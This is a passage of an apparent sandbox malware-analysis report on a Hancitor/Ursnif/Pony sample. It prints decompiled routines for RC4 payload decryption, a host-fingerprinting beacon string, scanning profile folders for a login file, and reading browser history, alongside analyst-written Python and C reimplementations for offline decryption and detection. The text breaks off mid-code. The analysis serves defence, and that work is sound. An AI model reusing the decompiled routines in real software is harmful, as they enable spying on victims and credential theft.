Statement addresses for the listing above, in line order (the decompiler's line-to-address map; 0x00000000 marks lines with no address): 0x02442f26, 0x02442f2d, 0x02442f34, 0x02442f3b, 0x02442f51, 0x02442f59, 0x02442f76, 0x02442f7e, 0x02442f86, 0x02442f92, 0x02442f9a, 0x02442fa0, 0x02442fb8, 0x02442fbc, 0x02442fc4, 0x02442fe4, 0x02442fed, 0x02442fed, 0x02442fe4, 0x02442fc4, 0x02442f9a, 0x02442f7e, 0x02442ff4, 0x02442ffa, 0x02443000, 0x02443000, 0x0244300b, 0x02443011, 0x02443017, 0x02443017, 0x02443022, 0x0244302a, 0x02443030, 0x02443030, 0x00000000

                                                                                                                                        APIs
                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,02441FCD), ref: 02442F51
                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 02442F76
                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 02442FFA
                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 02443011
                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0244302A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$ContextDestroyHash$AcquireCreateRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1222261195-0
                                                                                                                                        • Opcode ID: db66ee63ab3aeb611899154533d24326c1862f496751f286e24bab2a13267cb8
                                                                                                                                        • Instruction ID: 53fba3a0b7f050e2a1daa7b30d651da60f1c9acb35ec654c8e9acd625fdae07b
                                                                                                                                        • Opcode Fuzzy Hash: db66ee63ab3aeb611899154533d24326c1862f496751f286e24bab2a13267cb8
                                                                                                                                        • Instruction Fuzzy Hash: 02313E75E40208FBEB24CF90D848FAF77B8BB04704F10854AFA02A7284DBB5AA54DF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%
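Reading the constants in E02442F20 against the Windows SDK: CryptAcquireContextA is called with dwProvType = 1 (PROV_RSA_FULL) and dwFlags = 0xF0000000 (CRYPT_VERIFYCONTEXT, an ephemeral context with no key container), CryptCreateHash with 0x8004 (CALG_SHA1), CryptHashData over the key material passed in _a12 with length _a16, CryptDeriveKey with 0x6801 (CALG_RC4) and dwFlags = 0x280011, whose upper 16 bits request a 40-bit key and whose lower bits are CRYPT_EXPORTABLE | CRYPT_NO_SALT, and finally CryptDecrypt in place over the _a4 buffer of length _a8 with Final = TRUE, returning the decrypted length in _v20 (zero on any failure). Because CRYPT_NO_SALT is set and the requested key is shorter than the SHA-1 output, CryptDeriveKey takes the leading bytes of the hash as the key, so the buffer is simply RC4 keyed with the first 5 bytes of SHA-1(key material). The `if(_t32 != 0)` and `if(_t33 != 0)` tests after CryptCreateHash and CryptHashData are the decompiler's rendering of the BOOL each call leaves in eax, not re-tests of the earlier values. The Python below is an added, stand-alone reimplementation of that derivation and decryption for use on dumped buffers offline; it is not code from this report or from the sample, and the key material and ciphertext it uses are constructed for the demonstration rather than taken from the sample's memory.

```python
import hashlib

# Constants as they appear in the decompiled E02442F20 (values from the Windows SDK).
PROV_RSA_FULL = 0x00000001         # CryptAcquireContextA dwProvType
CRYPT_VERIFYCONTEXT = 0xF0000000   # CryptAcquireContextA dwFlags: ephemeral, no key container
CALG_SHA1 = 0x00008004             # CryptCreateHash algid
CALG_RC4 = 0x00006801              # CryptDeriveKey algid
CRYPT_EXPORTABLE = 0x00000001
CRYPT_NO_SALT = 0x00000010
DERIVE_FLAGS = 0x00280011          # (40 << 16) | CRYPT_EXPORTABLE | CRYPT_NO_SALT


def key_bits_from_flags(flags: int) -> int:
    """CryptDeriveKey carries the requested key length, in bits, in the upper 16 bits of dwFlags."""
    return flags >> 16


def derive_rc4_key(key_material: bytes, flags: int = DERIVE_FLAGS) -> bytes:
    """Reproduce CryptDeriveKey(CALG_RC4, <SHA-1 hash>, flags) for the CRYPT_NO_SALT case.

    With no salt and a requested length no greater than the hash output, the derived
    key is the leading key_bits/8 bytes of the hash. Longer keys (hash expansion) and
    the salted path are not modelled here, so they are rejected explicitly.
    """
    if not flags & CRYPT_NO_SALT:
        raise ValueError("only the CRYPT_NO_SALT derivation is modelled")
    key_len = key_bits_from_flags(flags) // 8
    digest = hashlib.sha1(key_material).digest()
    if key_len == 0 or key_len > len(digest):
        raise ValueError("requested key length outside the modelled range")
    return digest[:key_len]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key schedule + keystream XOR). Encryption and decryption are the same operation."""
    if not key:
        raise ValueError("empty key")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_blob(key_material: bytes, ciphertext: bytes) -> bytes:
    """Offline equivalent of E02442F20(buf, len, key, keylen): SHA-1 the key material,
    keep 5 bytes, RC4 the buffer. A stream cipher keeps the length, matching the
    function's return of the CryptDecrypt length."""
    return rc4(derive_rc4_key(key_material), ciphertext)


# Constructed demonstration input (not taken from the sample): a fake key string and a
# buffer that starts with an MZ header, encrypted with the same routine so the round
# trip can be checked.
SAMPLE_KEY = b"constructed-key-material"
SAMPLE_PLAINTEXT = b"MZ\x90\x00" + b"constructed payload bytes"
SAMPLE_CIPHERTEXT = rc4(derive_rc4_key(SAMPLE_KEY), SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print("key bits:", key_bits_from_flags(DERIVE_FLAGS))
    print("derived key:", derive_rc4_key(SAMPLE_KEY).hex())
    print("decrypted:", decrypt_blob(SAMPLE_KEY, SAMPLE_CIPHERTEXT))
```

To apply this to a real dump, pass the key material the sample feeds to CryptHashData (it can be recovered from the _a12/_a16 arguments at the 0x02442F86 call site) together with the buffer handed to CryptDecrypt. Note that the effective key is only 40 bits: if the key material is not recoverable but the plaintext prefix is known (for example an MZ header or a known configuration magic), the whole RC4 key space can be searched offline, so a missing key is not a hard stop for analysis.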

                                                                                                                                        C-Code - Quality: 95%
E02441580(void* __ecx, signed int __edx, void* _a4, intOrPtr _a8, DWORD* _a12) {
	char _v8;
	signed int _v12;
	intOrPtr _v16;
	char _v20;
	signed int _v24;
	char _v56;
	char _v312;
	char _v1336;
	signed int _t34;
	signed int _t38;
	signed int _t40;
	intOrPtr _t42;
	void* _t44;
	signed int _t45;
	intOrPtr _t50;
	char* _t51;
	intOrPtr _t54;
	intOrPtr _t55;
	intOrPtr _t56;
	intOrPtr _t57;
	void* _t61;
	signed int _t65;
	char* _t76;
	char* _t80;
	signed int _t82;
	signed int _t83;
	signed int _t88;
	char* _t92;
	signed int _t96;
	void* _t97;
	void* _t99;
	void* _t100;

	_t83 = __edx;
	_t34 =  *0x2447418; // 0xd1fddc2
	_t101 = _t34 |  *0x244741c;
	if((_t34 |  *0x244741c) == 0) {
		_t65 = E02441770(_t101); // executed
		 *0x2447418 = _t65;
		 *0x244741c = _t83;
	}
	if( *0x2447420 == 0) {
		 *0x2447420 = GetVersion();
	}
	E02443360( &_v312); // executed
	E02441ED0( &_v56); // executed
	_t99 = _t97 + 8;
	_t38 =  *0x2447420; // 0x42ee000a
	_v12 = _t38 & 0xff;
	_t40 =  *0x2447420; // 0x42ee000a
	_v24 = (_t40 & 0xffff) >> 0x00000008 & 0xff;
	_v20 = 0;
	_t42 = E02443690(); // executed
	_v20 = _t42;
	if(_v20 != 1) {
		_push(_v24);
		_t44 = E02441F70( &_v312);
		_t88 =  *0x244741c; // 0x4f492964
		_t45 =  *0x2447418; // 0xd1fddc2
		wsprintfA( &_v1336, "GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)", _t45, _t88, _t44,  &_v312,  &_v56, _v12);
		_t100 = _t99 + 0x24;
	} else {
		_push(_v24);
		_t61 = E02441F70(_v12); // executed
		_t82 =  *0x244741c; // 0x4f492964
		_t96 =  *0x2447418; // 0xd1fddc2
		wsprintfA( &_v1336, "GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)", _t96, _t82, _t61,  &_v312,  &_v56, _v12);
		_t100 = _t99 + 0x24;
	}
	if( *0x2447414 == 0) {
		_t57 = E02441390(0x400);
		_t100 = _t100 + 4;
		 *0x2447414 = _t57;
		_t80 =  *0x2447414; // 0x283cb28
		 *_t80 = 0;
	}
	_v16 = 1;
	while(_v16 == 1) {
		_t76 =  *0x2447414; // 0x283cb28
		if( *_t76 == 0) {
			_t55 =  *0x2447414; // 0x283cb28
			_t56 = E02441FE0(_t76, _t55);
			_t100 = _t100 + 4;
			_v16 = _t56;
		}
		_v8 = 0;
		_t92 =  *0x2447414; // 0x283cb28
		_t50 = E02442250(_t92,  &_v1336, _a4, _a8, _a12); // executed
		_t100 = _t100 + 0x14;
		_v8 = _t50;
		if(_v8 == 1) {
			_t54 = E024414E0( &_v1336, _a4);
			_t100 = _t100 + 4;
			_v8 = _t54;
		}
		if(_v8 != 1) {
			_t51 =  *0x2447414; // 0x283cb28
			 *_t51 = 0;
			continue;
		} else {
			return 1;
		}
	}
	__eflags = 0;
	return 0;
}

                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32 ref: 024415AF
                                                                                                                                        • wsprintfA.USER32 ref: 02441652
                                                                                                                                          • Part of subcall function 02441770: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,0244159B,00004000), ref: 024417B5
                                                                                                                                          • Part of subcall function 02441770: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02441828
                                                                                                                                          • Part of subcall function 02441770: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0244185E
                                                                                                                                        • wsprintfA.USER32 ref: 0244168F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$AdaptersAddressesDirectoryInformationVersionVolumeWindows
                                                                                                                                        • String ID: GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)$GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)$d)IO
                                                                                                                                        • API String ID: 2510645398-2750374242
                                                                                                                                        • Opcode ID: 649a2147f3860a00c4273458a4d92f3438e57c238e8b3e22fd592a13ea3dc256
                                                                                                                                        • Instruction ID: c0190bf76768e4f6dff054f76ae3e4336d41ce78f807509ce367fe8dee6a24c4
                                                                                                                                        • Opcode Fuzzy Hash: 649a2147f3860a00c4273458a4d92f3438e57c238e8b3e22fd592a13ea3dc256
                                                                                                                                        • Instruction Fuzzy Hash: BD51B7B9D001149FE718EF94ED44BBABBF9EB44341F10897AE10D97240DB34A695CFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                         			E10004DF4(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) { // _a4: context handed to E10004D93; _a8: base directory; _a12: string appended to each directory (roles inferred from use)
                                                                                                                                         				struct _WIN32_FIND_DATAA _v324;
                                                                                                                                         				void* _v328; // find handle
                                                                                                                                         				CHAR* _v332; // search pattern "<base>\*.*"
                                                                                                                                         				char** _v336;
                                                                                                                                         				char* _t31;
                                                                                                                                         				void* _t40;
                                                                                                                                         
                                                                                                                                         				_v332 = 0;
                                                                                                                                         				_t31 = _a8;
                                                                                                                                         				if(_t31 == 0 ||  *_t31 == 0) { // NULL or empty base path: nothing to enumerate
                                                                                                                                         					L12:
                                                                                                                                         					return E10001871(_v332); // E10001871 releases strings built by E10001DB1/E10001E05 (inferred: it is called on every temporary)
                                                                                                                                         				} else {
                                                                                                                                         					E10004D93(_a4, E10001DB1(_a8, _a12)); // executed -- handler for <base><suffix>; E10001DB1/E10001E05 behave as string concatenation
                                                                                                                                         					E10001871(_t33);
                                                                                                                                         					_v332 = E10001DB1(_a8, "\*.*");
                                                                                                                                         					E1000189F( &_v324, 0x13e); // initialise the find buffer; 0x13e == sizeof(WIN32_FIND_DATAA)
                                                                                                                                         					_t40 = FindFirstFileA(_v332,  &_v324); // executed
                                                                                                                                         					_v328 = _t40;
                                                                                                                                         					if(_t40 + 1 == 0) { // INVALID_HANDLE_VALUE
                                                                                                                                         						goto L12;
                                                                                                                                         					} else {
                                                                                                                                         						goto L4;
                                                                                                                                         					}
                                                                                                                                         					do {
                                                                                                                                         						L4:
                                                                                                                                         						if((_v324.dwFileAttributes & 0x00000010) != 0) { // FILE_ATTRIBUTE_DIRECTORY
                                                                                                                                         							if(lstrcmpiA(0x1000f8fd,  &( &_v324->cFileName)) != 0) { // skip "." and ".." (inferred: the two constants are 2 bytes apart, as ".\0" followed by "..\0" would be)
                                                                                                                                         								if(lstrcmpiA(0x1000f8ff,  &( &_v324->cFileName)) != 0) {
                                                                                                                                         									_v336 =  &( &_v324->cFileName);
                                                                                                                                         									E10004D93(_a4, E10001E05(E10001E05(E10001DB1(_a8, "\\"), _v336), _a12)); // handler for <base>\<subdir><suffix>; one level only, no recursion into the subdirectory
                                                                                                                                         									E10001871(_t53);
                                                                                                                                         								}
                                                                                                                                         							}
                                                                                                                                         						}
                                                                                                                                         					} while (FindNextFileA(_v328,  &_v324) != 0);
                                                                                                                                         					FindClose(_v328);
                                                                                                                                         					goto L12;
                                                                                                                                         				}
                                                                                                                                         			}
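What this loop enumerates is easy to misread from the decompiled form: E10004D93 is called for <base><suffix> and then once for <base>\<subdir><suffix> for each immediate subdirectory (skipping the two entries compared against 0x1000f8fd and 0x1000f8ff, which by their spacing are "." and ".."), and it never descends further. That is the shape of a profile-directory scan, where each profile is one subfolder holding a file of known name. The Python below is an added illustration written for this report, not the sample's code: expand_profile_dirs and the other names are hypothetical, os.scandir stands in for FindFirstFileA/FindNextFileA, os.sep replaces the hard-coded backslash so it runs off Windows, and the directory tree it walks is constructed inline, with a copy of the target file placed two levels down to show that it is not reached.

```python
import os
import tempfile

# Suffix appended to each candidate directory, the role _a12 plays in the listing.
# The file name is constructed for this example.
TARGET_SUFFIX = os.sep + "logins.dat"


def expand_profile_dirs(base, suffix):
    """Rebuild the candidate list E10004DF4 hands to E10004D93 (hypothetical re-implementation).

    Order follows the listing: <base><suffix> first, then <base>/<subdir><suffix>
    for every immediate subdirectory. Only one level is walked; there is no recursion.
    """
    if not base:
        return []                       # the listing returns early on a NULL or empty base path
    candidates = [base + suffix]        # E10004D93(_a4, E10001DB1(_a8, _a12))
    try:
        it = os.scandir(base)           # stands in for FindFirstFileA(base + "\\*.*") / FindNextFileA
    except OSError:
        return candidates               # INVALID_HANDLE_VALUE branch: only the base candidate is produced
    with it:
        for entry in it:
            if entry.name in (".", ".."):           # the two lstrcmpiA checks; Win32 yields these, os.scandir does not
                continue
            if entry.is_dir(follow_symlinks=False):  # dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY (0x10)
                candidates.append(base + os.sep + entry.name + suffix)
    return candidates


def existing_targets(base, suffix):
    """Candidates that exist on disk, i.e. the files a per-path handler would actually open."""
    return [p for p in expand_profile_dirs(base, suffix) if os.path.isfile(p)]


def build_sample_tree():
    """Constructed layout: two profile folders, a stray top-level file, and a copy of the
    target two levels down that the one-level walk must not find."""
    root = tempfile.mkdtemp(prefix="profiles_")
    for rel in ("profile.a", os.path.join("profile.b", "nested")):
        os.makedirs(os.path.join(root, rel))
    for rel in (os.path.join("profile.a", "logins.dat"),
                os.path.join("profile.b", "nested", "logins.dat"),
                "readme.txt"):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("sample\n")
    return root


def demo():
    """Walk the constructed tree; returns (root, candidates, hits)."""
    root = build_sample_tree()
    return root, expand_profile_dirs(root, TARGET_SUFFIX), existing_targets(root, TARGET_SUFFIX)


if __name__ == "__main__":
    root, candidates, hits = demo()
    print("candidates:", *candidates, sep="\n  ")
    print("present on disk:", *hits, sep="\n  ")
```

For detection purposes the useful signal is the shape of the file-system activity this produces: one FindFirstFile on <base>\*.* followed by a burst of opens of the same file name under each sibling directory, which is distinctive enough to look for in sandbox file-access traces.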









                                                                                                                                         Address column (one entry per statement of the listing above; 0x00000000 marks statements without a code address): 0x10004dfd 0x10004e0a 0x10004e0c 0x10004f1c 0x10004f28 0x10004e18 0x10004e28 0x10004e2d 0x10004e3f 0x10004e51 0x10004e63 0x10004e68 0x10004e6f 0x00000000 0x00000000 0x00000000 0x00000000 0x10004e75 0x10004e75 0x10004e81 0x10004e99 0x10004eb3 0x10004ec0 0x10004eed 0x10004ef2 0x10004ef2 0x10004eb3 0x10004e99 0x10004f09 0x10004f17 0x00000000 0x10004f17

                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 10004E63
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FD,?,00000000,?,00000000), ref: 10004E92
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FF,?,1000F8FD,?,00000000,?,00000000), ref: 10004EAC
                                                                                                                                        • FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 10004F04
                                                                                                                                        • FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 10004F17
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$Filelstrcmpi$CloseFirstNext
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 3663067366-1173974218
                                                                                                                                        • Opcode ID: 6e9f3b2f661a78dfcedb154696400a72def13b63283fb19ae1fe3acc463d6ff2
                                                                                                                                        • Instruction ID: ca2568b92c372c15e6a77308df9f7a69600f7f07acdd9bda305e561ea92058fa
                                                                                                                                        • Opcode Fuzzy Hash: 6e9f3b2f661a78dfcedb154696400a72def13b63283fb19ae1fe3acc463d6ff2
                                                                                                                                        • Instruction Fuzzy Hash: 7431FEB5800259AEFF21DF60CC42BED77A9FF043C0F0581A5FA0895069EB70AE959F54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                         			E10007FE8(intOrPtr _a4) {
                                                                                                                                         				void* _v8; // COM object created below
                                                                                                                                         				void* _v12; // enumerator obtained from it via vtable slot +0x1c
                                                                                                                                         				short _v44; // record +0x08: second string pointer (title)
                                                                                                                                         				WCHAR* _v48; // record +0x04: first string pointer (URL)
                                                                                                                                         				char _v52; // record +0x00: cbSize
                                                                                                                                         				char _v56; // number of records fetched by the Next() call
                                                                                                                                         				short _v60;
                                                                                                                                         				char* _t34;
                                                                                                                                         				void* _t35;
                                                                                                                                         				short* _t45;
                                                                                                                                         				void* _t47;
                                                                                                                                         
                                                                                                                                         				_t34 =  &_v8;
                                                                                                                                         				_push(_t34); // ppv
                                                                                                                                         				_push(0x100102e6); // riid (not resolved in this listing)
                                                                                                                                         				_push(5); // dwClsContext = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER
                                                                                                                                         				_push(0); // pUnkOuter
                                                                                                                                         				_push(0x100102d6); // executed -- rclsid (not resolved in this listing)
                                                                                                                                         				L1000BA76(); // executed -- CoCreateInstance, see APIs below (ref 10008000)
                                                                                                                                         				if(_t34 < 0) { // FAILED(hr): the decompiler reuses _t34 for the returned HRESULT
                                                                                                                                         					L15:
                                                                                                                                         					_t35 = E10007E6C(_t47, _a4, L"http://www.facebook.com/", 0); // executed -- always reached last: the per-URL handler runs once more with this fixed URL, whether or not any history was read
                                                                                                                                         					return _t35;
                                                                                                                                         				}
                                                                                                                                         				_push( &_v12);
                                                                                                                                         				_push(_v8);
                                                                                                                                         				if( *((intOrPtr*)( *_v8 + 0x1c))() < 0 || _v12 == 0) { // vtable slot 7 (+0x1c) hands back an enumerator; on IUrlHistoryStg/IUrlHistoryStg2 this slot is EnumUrls
                                                                                                                                         					L14:
                                                                                                                                         					 *((intOrPtr*)( *_v8 + 8))(_v8); // IUnknown::Release (vtable +8)
                                                                                                                                         					goto L15;
                                                                                                                                         				} else {
                                                                                                                                         					_v48 = 0;
                                                                                                                                         					_v44 = 0;
                                                                                                                                         					_v52 = 0x28; // cbSize; 0x28 == sizeof(STATURL), whose first three fields are cbSize, pwcsUrl, pwcsTitle
                                                                                                                                         					while(1) {
                                                                                                                                         						_v56 = 0;
                                                                                                                                         						_push( &_v56); // pceltFetched
                                                                                                                                         						_push( &_v52); // record buffer
                                                                                                                                         						_push(1); // celt = 1
                                                                                                                                         						_push(_v12);
                                                                                                                                         						if( *((intOrPtr*)( *_v12 + 0xc))() != 0 || _v56 != 1) { // vtable +0xc: Next(); stop on S_FALSE/error or when nothing was fetched (IEnumSTATURL layout)
                                                                                                                                         							break;
                                                                                                                                         						}
                                                                                                                                         						if(_v48 != 0) {
                                                                                                                                         							_t45 = StrStrIW(_v48, 0x10010306); // case-insensitive search in the URL for the wide string at 0x10010306 (not resolved here)
                                                                                                                                         							if(_t45 == 0) {
                                                                                                                                         								_v60 = 0;
                                                                                                                                         							} else {
                                                                                                                                         								 *_t45 = 0; // truncate the URL at the match and pass the split point along
                                                                                                                                         								_v60 = _t45;
                                                                                                                                         							}
                                                                                                                                         							E10007E6C(_t47, _a4, _v48, _v60); // executed -- per-URL handler
                                                                                                                                         							_push(_v48);
                                                                                                                                         							L1000BA70(); // CoTaskMemFree(url), see APIs below (ref 100080A2)
                                                                                                                                         							if(_v44 != 0) {
                                                                                                                                         								_push(_v44);
                                                                                                                                         								L1000BA70(); // CoTaskMemFree(title), ref 100080B0
                                                                                                                                         							}
                                                                                                                                         						}
                                                                                                                                         					}
                                                                                                                                         					 *((intOrPtr*)( *_v12 + 8))(_v12); // Release() the enumerator
                                                                                                                                         					goto L14;
                                                                                                                                         				}
                                                                                                                                         			}














                                                                                                                                         Address column (one entry per statement of the listing above; 0x00000000 marks statements without a code address): 0x10007fee 0x10007ff1 0x10007ff2 0x10007ff7 0x10007ff9 0x10007ffb 0x10008000 0x10008007 0x100080cd 0x100080d7 0x100080dd 0x100080dd 0x10008015 0x10008016 0x1000801e 0x100080c2 0x100080ca 0x00000000 0x1000802e 0x1000802e 0x10008035 0x1000803c 0x10008043 0x10008043 0x10008052 0x10008056 0x10008057 0x10008059 0x10008061 0x00000000 0x00000000 0x1000806d 0x1000807c 0x1000807e 0x1000808a 0x10008080 0x10008080 0x10008085 0x10008085 0x1000809a 0x1000809f 0x100080a2 0x100080ab 0x100080ad 0x100080b0 0x100080b0 0x100080ab 0x100080b5 0x100080bf 0x00000000 0x100080bf

                                                                                                                                        APIs
                                                                                                                                        • CoCreateInstance.OLE32(100102D6,00000000,00000005,100102E6,?), ref: 10008000
                                                                                                                                        • StrStrIW.SHLWAPI(00000000,10010306), ref: 10008077
                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,10010306), ref: 100080A2
                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,00000000,10010306), ref: 100080B0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeTask$CreateInstance
                                                                                                                                        • String ID: ($http://www.facebook.com/
                                                                                                                                        • API String ID: 2903366249-3677894361
                                                                                                                                        • Opcode ID: 8f3a87d63b887a218965d62a6876c54d32db941eb3b8df55ee95578add9bc555
                                                                                                                                        • Instruction ID: 2e64bef66f41ddc4b1a66eece88495d7a9d10eb9c068adbd9e87130d3328e792
                                                                                                                                        • Opcode Fuzzy Hash: 8f3a87d63b887a218965d62a6876c54d32db941eb3b8df55ee95578add9bc555
                                                                                                                                        • Instruction Fuzzy Hash: 1D31D834A00109EBEF51DF90DC49BCEBBB5FF08394F208161F5407A1A9D7759A85DB51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 75%
			E02443690() {
				_Unknown_base(*)()* _v8;
				struct _SYSTEM_INFO _v44;

				E024414A0( &_v44, 0, 0x24); // memset-like helper; 0x24 == sizeof(SYSTEM_INFO)
				// GetNativeSystemInfo is resolved at run time so the code still works where it is absent;
				// under WOW64 it reports the real host architecture, GetSystemInfo would report x86.
				_v8 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo");
				if(_v8 == 0) {
					GetSystemInfo( &_v44);
				} else {
					_v8( &_v44);
				}
				// The low word of the leading union is wProcessorArchitecture; 9 == PROCESSOR_ARCHITECTURE_AMD64.
				// Returns 1 on a 64-bit host, 0 otherwise.
				if((_v44.dwOemId & 0x0000ffff) != 9) {
					return 0;
				} else {
					return 1;
				}
			}





Instruction addresses for E02443690 (one per source line, in order): 0x0244369e, 0x024436bd, 0x024436c4, 0x024436d3, 0x024436c6, 0x024436ca, 0x024436ca, 0x024436e0, 0x00000000, 0x024436e2, 0x00000000, 0x024436e2

                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,?,?,?,?,02441616), ref: 024436B0
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 024436B7
                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 024436CA
                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 024436D3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                        • API String ID: 3433367815-192647395
                                                                                                                                        • Opcode ID: 93371b545174a059cdea28744164dea968e72c38e83e8c50afe26ffeb16695fc
                                                                                                                                        • Instruction ID: 24216ae7f7160d90c8cef98bea5d8f925e8ff2a82e52afe02114463377d73a51
                                                                                                                                        • Opcode Fuzzy Hash: 93371b545174a059cdea28744164dea968e72c38e83e8c50afe26ffeb16695fc
                                                                                                                                        • Instruction Fuzzy Hash: 6CF0B434D44208EBF7149FE0980ABEDBBB8AB08F11F504447E902B6240EB749694CB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%
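As an added example (not code from this report, nor from the Hancitor/Ursnif/Pony sample it analyses), the following C shows the host test E02443690 makes above (low word of SYSTEM_INFO compared with 9) together with the PE header walk that the injection routine E024434F0 further down this page performs with raw offsets (e_lfanew at 0x3c, ImageBase at NT headers + 0x34, SizeOfImage at + 0x50). It goes beyond the sample in two ways an analyst needs when the same walk is applied to an untrusted memory dump: every read is bounds-checked, PE32+ is handled alongside PE32, and the base relocation directory is checked so that an image which, like E024434F0's fallback VirtualAllocEx, lands away from its preferred base can be recognised as rebasable or not. The struct and function names are the example's own, the PE32 header produced by build_sample_pe32 is constructed for the example (not a real binary), and no Windows API is called, so it compiles and runs on any C compiler.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define IMAGE_FILE_MACHINE_I386       0x014c
#define IMAGE_FILE_MACHINE_AMD64      0x8664
#define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10b
#define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b
#define PROCESSOR_ARCHITECTURE_AMD64  9      /* the value E02443690 compares against */

struct pe_info {                 /* example's own struct, not a Windows type */
    uint16_t machine;            /* IMAGE_FILE_HEADER.Machine */
    uint16_t magic;              /* OptionalHeader.Magic: 0x10b PE32, 0x20b PE32+ */
    uint64_t image_base;         /* OptionalHeader.ImageBase, what E024434F0 reads at NT+0x34 */
    uint32_t size_of_image;      /* OptionalHeader.SizeOfImage (NT+0x50), the VirtualAllocEx size */
    uint32_t reloc_size;         /* DataDirectory[5].Size; 0 means the image cannot be rebased */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }
static uint64_t rd64(const uint8_t *p) { return (uint64_t)rd32(p) | ((uint64_t)rd32(p + 4) << 32); }
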